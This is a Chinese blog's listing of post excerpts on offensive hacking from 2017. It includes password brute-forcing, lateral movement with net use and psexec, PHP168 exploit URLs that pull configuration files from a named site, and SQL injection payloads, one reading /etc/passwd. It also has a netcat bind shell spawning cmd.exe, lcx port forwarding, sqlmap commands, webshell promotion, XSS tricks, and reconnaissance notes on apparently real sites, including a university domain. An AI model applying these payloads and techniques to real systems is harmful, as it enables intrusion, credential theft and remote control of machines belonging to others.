- 博客(99)
- 收藏
- 关注
RSS订阅原创 密码及口令爆破
1.MSSQL Server口令破解工具使用 Target:192.168.1.1 Protocol:MSSQL Port:1433 User:sa Dictionary:C:\pass.txt 点击start2.FTP口令破解 Target:192.168.1.1 Protocol:FTP Port:21 User:ftpuser Dictionary:C:\pass.tx
2017-09-30 16:53:14
3680
1
转载 网站入侵一般流程
1、信息收集1.1/ Whois信息--注册人、电话、邮箱、DNS、地址1.2/ Googlehack--敏感目录、敏感文件、更多信息收集1.3/ 服务器IP--Nmap扫描、端口对应的服务、C段1.4/ 旁注--Bing查询、脚本工具1.5/ 如果遇到CDN--Cloudflare(绕过)、从子域入手(mail,postfix)、DNS传送域漏洞1
2017-09-27 11:49:16
9204
1
转载 一次通过漏洞挖掘成功渗透某网站的过程
寻找突破口对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方,于是开始分析其二级域名,发现其中某资源管理分站,目标操作系统linux,仅开放HTTP(80端口),整站程序为ResourceSpace,一个开源php建站程序。漏洞挖掘因为是开源程序,考虑其漏洞挖掘相对容易一些,于是决定把这个网站作为突破口。于是到resourcespace的官方网站
2017-09-27 09:12:47
14045
3
原创 内网渗透技巧
一.获取了账号和密码1.获取了账号和密码,进行内网碰撞net use \\192.168.1.1\c$ "123" "123"2.获取了账号和密码,进行内网验证net use \\192.168.1.1\ipc$ "123" /user:"123"3.获取了账号和密码,获取cmdshellpsexec \\192.168.1.1 -u 123 -p 123 cmd二.扫
2017-09-26 11:26:48
1186
转载 PHP168整站系统0DAY漏洞预警
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="http://dabei.org//job.php?job=download&ur
2017-09-25 22:15:06
2360
原创 mysql报错大法
mysql常用的注入用法:利用rand&groupby报错大法and (select 1 from (select count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a from information_schema.tables group by a)b) and
2017-09-25 19:13:01
519
原创 Access注入
1.判断数据库类型id=1 and (select count(*) from sysobjects)>02.判断注入点id=1 and 1=1 id=1 and 1=23.判断列数
2017-09-20 16:49:15
661
原创 抓包工具+Access注入
GET注入,POST注入,Cookie注入,消息头注入数字型注入字符型注入搜索型注入联合查询注入报错型注入盲注入(基于时间型盲注,基于逻辑错误)切记:access没有注释符注意:union select 后门一定要跟from表名,而只能靠猜表名注意:Access只能靠猜,所以
2017-09-18 11:53:08
2246
原创 信息收集
主动信息收集:1.端口扫描:-sT, -sU,-Pn,-p,-sV,-O -v 详细信息-A 系统版本,服务信息等 -T设置时间模板,比如 -T 42.web脚本扫描3.系统及第三方中间件扫描被动信息收集:1.Google hacking技术,比如网站后台地址,二级域名2.whois查询3.IP定位,旁注查询
2017-09-18 09:15:33
666
原创 Asp大马介绍
最近草泥马这款最新版的Asp大马很热门,主流大马的提权功能,信息收集功能,以及木马隐藏功能都十分不错。"星外主机提权"、“华众主机提权”、“N点主机提权”、“新网主机提权”
2017-09-15 17:48:10
4662
1
原创 使用nc获取cmdshell
NetCat简称nc正向连接的方式就是在目标主机上绑定一个端口,当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理,从而客户端获取一个类型命令提示符的执行环境执行命令:CMD路径:c:\windows\system32\cmd.exe1.语句:\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe2.客户端直接使用te
2017-09-13 18:08:07
1274
原创 SQL注入整合
Access数据库注入:1.Access数据库联合查询方式注入判断表名:?id=1 and (select count(*) from admin)>0和?id=1 and exists(select * from admin)>0的任意一种方法判断列名:?id=1 and exists(select username from admin)判断当前表的字段数:?id=
2017-09-12 19:05:22
751
原创 Lcx端口转发和映射
连接内网服务器的3389:1.确定被控制计算机的内网ip2.被控制的计算机执行:lcx -slave 本地ip 51 被控制计算机ip 33893.本地执行:lcx -listen 51 100004.用mstsc链接:127.0.0.1:10000
2017-09-11 15:02:12
1942
原创 测试网站:http://001.lostcity.com
测试网站:http://001.lostcity.com1、sql注入寻找注入点,并用工具渗透,找到admin用户和密码2、扫描后台,找到后台登陆地址,起始地址:http://001.lostcity.com用御剑扫描3、用1、2扫描到的密码及地址,登陆后台4、进入后台,发现上传文件的地方,尝试上传一句话木马,但上传失败
2017-09-08 17:29:40
1040
原创 SQLMAP
Sqlmap命令注入MySQL数据库查看是否存在SQL注入python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --cookie='security=low'探测数据库名称python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --dbs
2017-09-08 15:32:35
302
原创 hqu.edu.cn域名测试
信息收集:获得域名IP:218.193.82.10测试域名开启25,110,8080端口,邮箱发送协议SMTP,邮箱接收协议POP3,Tomcat采用nmap进行端口扫描:操作系统识别:Linux2.6.18-2.6.22之间网站敏感目录查找:http://www.hqu.edu.cn/index.htmhttp://www.hqu.edu.cn
2017-09-07 20:03:14
1055
转载 SSRF漏洞
SSRF漏洞的寻找(漏洞常见出没位置):1)分享:通过URL地址分享网页内容2)转码服务3)在线翻译4)图片加载与下载:通过URL地址加载或下载图片5)图片、文章收藏功能6)未公开的api实现以及其他调用URL的功能7)从URL关键字中寻找 sharewapurllinksrcsour
2017-09-07 17:34:09
1193
原创 漏洞挖掘-混浠的代码
1.浏览器的进制常识浏览器中常用的进制有二进制Binary,十进制Octal和十六进制HexHTML的属性中用到十进制和十六进制CSS的属性中用到十进制和十六进制JavaScript有八进制和十六进制2.浏览器的编码常识HTMLEncode函数URLEncode函数escape/unescape函数3.HTML中的代码注入技巧3.1标签3.2属性3.
2017-09-07 10:54:55
433
原创 漏洞挖掘
alert() 弹出个提示框 (确定) confirm() 弹出个确认框 (确定,取消) prompt() 弹出个输入框 让你输入东西
2017-09-06 15:46:48
1047
原创 phpcms安装教程
phpcms非常适合用来建立资讯类网站,比如政府、高校、行业门户和地区门户等新闻资讯。文章支持图文混排,可插入图片、flash和其他多媒体文件,也可上传附件。phpcms可安装到企业内网上用来做内部资料库,也可以通过phpcms数据提取功能与其他系统协同工作,比如OA系统、采集器。
2017-09-06 14:43:45
1547
转载 preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞
漏洞利用思路:这个漏洞目前没法直接利用,因为有token限制,需要登陆抓到token,同时需要构造第三个参数保证和第一个参数匹配上,第一个参数可控,但是第三个参数是从数据库中取出的,所以只能提前插入到数据库中,然后再取出来,columnIndex是取出字段值的可控,所以第三个参数也可控了。//$find = ’0/e’;//$fromsqldata = ’0/e’;//echo pre
2017-09-06 11:56:59
753
原创 wordpress存储型XSS
使用style,将这个标签区域放大,适合触发。1.使用style,将标签区域放大,适合触发2.使用其他事件,无需用户交互,直接触发在任意标签上加tabindex即可让这个标签可以被TAB选中,于是就有了onfocus事件。然后访问#a即可触发
2017-09-06 09:55:58
1129
原创 AWVS使用教程
工具分为 4大块。简要概述我们最相关的3部分 1) web scanner: 扫描器,默认情况产生10个线程的爬虫 2) 工具箱: 集成很多好用的工具,比如 http fuzzer 3) 配置: 呵呵,只要懂英文就看得明白 1.点击new scan,启动扫描注意:可以设置扫描重点,默认15种配置如下:扫描结果分析
2017-09-05 14:06:24
33710
2
原创 FineCMS1.7.9版本网站渗透
虚拟机输入:http://10.4.4.90/finecms/index.php?s=admin&c=login登陆网站后台:admin/admin
2017-09-05 11:57:00
791
原创 FineCMS安装教程
FineCMS(简称FC)是一款基于PHP+MySql开发的中小型内容管理系统,采用MVC设计模式实现业务逻辑与表现层的适当分离,使网页设计师能够轻松设计出理想的模板, 插件化方式开发功能易用便于扩展,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案。目前有三个分支:1.x,2.x,5.x。FineCMS基本目录结构 ..../cache
2017-09-05 09:38:53
5578
原创 常见端口漏洞
Windows中可以通过Internet信息服务(IIS)来提供FTP连接和管理,也可以单独安装FTP服务器软件来实现FTP功能,比如常见的FTP Serv-U。
2017-09-04 21:48:17
22325
1
原创 Win10虚拟机ping本地ip
1.设置成桥接模式2.手动设置ip地址3.查看ip4.ping本机地址注意:需要设置防火墙关闭防火墙或者设置入站规则
2017-09-04 15:25:47
1020
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人